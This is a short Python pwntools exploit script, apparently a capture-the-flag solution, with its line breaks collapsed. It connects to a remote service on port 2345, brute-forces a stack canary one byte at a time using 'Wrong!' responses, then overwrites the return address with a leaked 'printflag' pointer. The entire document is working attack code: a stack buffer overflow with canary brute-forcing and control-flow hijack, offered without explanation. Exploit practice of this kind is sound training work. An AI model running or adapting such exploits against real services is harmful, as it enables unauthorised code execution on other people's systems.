from pwn import * context.log_level = 'error' offset = 32 y = 0 buf = ("A"*offset + "B"*8) #+ p64(0xead62b27d92cf000) # +chr(0)+chr(191)+chr(217)+chr(151)+chr(59)+chr(107)+chr(161)+chr(22) i=0 g=0 while i != 0x100 and g<8: r = remote('', 2345) r.recvuntil("Pointer to printflag is 0x") addr = int(r.recvuntil("\n"), 16) #print("Pointer is %x" % addr) exploit = buf + chr(i) #+ p64(addr) r.send(exploit) try: r.recvuntil("Wrong!") buf = buf + chr(i) print(str(i)) i=0 g=g+1 except: print ".", i=i+1 r.close() r = remote('', 2345) stdout = r.recvuntil("Pointer to printflag is 0x") addr = int(r.recvuntil("\n"), 16) print("Pointer is %x" % addr) exploit = buf + p64(addr) + p64(addr) print(exploit) r.send(exploit) print(r.recv())